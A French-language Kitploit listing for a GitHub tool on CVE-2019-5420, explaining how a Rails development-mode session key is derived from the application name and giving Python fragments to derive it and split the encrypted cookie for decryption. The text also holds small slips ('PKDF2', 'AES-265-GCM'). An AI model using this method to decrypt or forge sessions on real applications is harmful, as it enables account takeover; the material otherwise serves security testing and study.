Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/j4k0m/cve-2019-5420
Outils de Chiffrement/DéchiffrementAttaques de Mots de PasseAnalyse des VulnérabilitésExploitation d'Applications WebTests d'Intrusion
GitHubj4k0m/cve-2019-5420

CVE-2019-5420

Une vulnérabilité peut permettre à un attaquant de deviner le jeton secret de mode développement généré automatiquement.

Voir le dépôt
512il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2019-5420

Une vulnérabilité peut permettre à un attaquant de deviner le jeton secret de mode développement généré automatiquement.

Ruby-on-Rails lorsqu'il est exécuté en mode développement. En mode développement, il est possible pour un attaquant de deviner la clé utilisée pour sécuriser les sessions.

Déchiffrement :

Génération de la clé :

Rails utilise 3 environnements (développement, test, production). Lorsqu'une application utilise le mode développement, vous pouvez deviner le jeton secret et déchiffrer la session chiffrée.

La clé utilisée pour protéger la session est dérivée du nom de l'application.

Exemple :

root@kitploit:~
rails new Jakom

Jakom : Nom de l'application.

Ainsi, nous pouvons deviner que la clé est le résultat de la méthode de génération :

root@kitploit:~
PKDF2_HMAC_SHA1[ MD5 [ APPNAME + "::Application" ] , salt: "authenticated encrypted cookie" , iterations: 1000 , key's length: 32 ]

Comme nous pouvons le voir ici :

root@kitploit:~
key = pbkdf2_hmac("sha1", md5_name.encode("utf-8"), "authenticated encrypted cookie".encode("utf-8"), 1000, 32)

Déchiffrer la session avec la clé :

Dans Rails, les sessions sont chiffrées avec AES-265-GCM. Si vous avez la clé, vous pouvez déchiffrer/chiffrer des sessions.

La dernière chose dont vous aurez besoin est le format de la session :

root@kitploit:~
BASE64 [ DATA ] -- BASE64 [ IV ] -- BASE64 [ AUTH_TAG ]

Exemple de déchiffrement :

Comme nous pouvons le voir ici :

root@kitploit:~
data = binascii.hexlify(base64.b64decode(base64_data.split("--")[0])).decode("utf-8")
iv = binascii.hexlify(base64.b64decode(base64_data.split("--")[1])).decode("utf-8")
tag = binascii.hexlify(base64.b64decode(base64_data.split("--")[2])).decode("utf-8")

La première partie du cookie de session est la donnée chiffrée, la deuxième partie est le IV, la troisième partie est le tag GCM (tag d'authentification). Avec ces informations, nous pouvons déchiffrer nos sessions directement : image

Exemple :

image

Télécharger l’outil